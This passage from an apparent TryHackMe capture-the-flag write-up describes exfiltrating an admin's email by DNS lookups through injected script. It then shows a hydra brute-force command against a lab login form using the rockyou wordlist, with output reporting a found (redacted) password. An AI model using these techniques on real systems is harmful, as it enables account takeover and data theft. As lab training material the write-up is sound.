And also in the DNS lookup tool provided by tryhackme, there were lookups for the A and AAAA records from unknown IP. There were no HTTP requests from that IP!
It must have been from the Admin!
Exploiting DNS lookups
So, we must exfiltrate the admin's email via DNS lookups.
We can fetch email from the innerHTML of the email DOM element.
And then append the email as a subdomain. (Classic DNS exfiltration)!
NOTE: We need to replace the @ and . characters in the email.
We can get back the admin's email in the DNS lookup:
Bruteforcing the password
Use hydra or Burp intruder to bruteforce the password:
$ hydra -l "<REDACTED>.thm" -P /usr/share/wordlists/rockyou.txt 10.10.118.129 http-post-form "/login:email=^USER^&password=^PASS^&Login=Login:Invalid email / password combination" -V
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-10 13:38:49
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.118.129:80/login:email=^USER^&password=^PASS^&Login=Login:Invalid email / password combination
[..snip..]
[80][http-post-form] host: 10.10.118.129 login: <REDACTED>.thm password: <REDACTED>
[..snip..]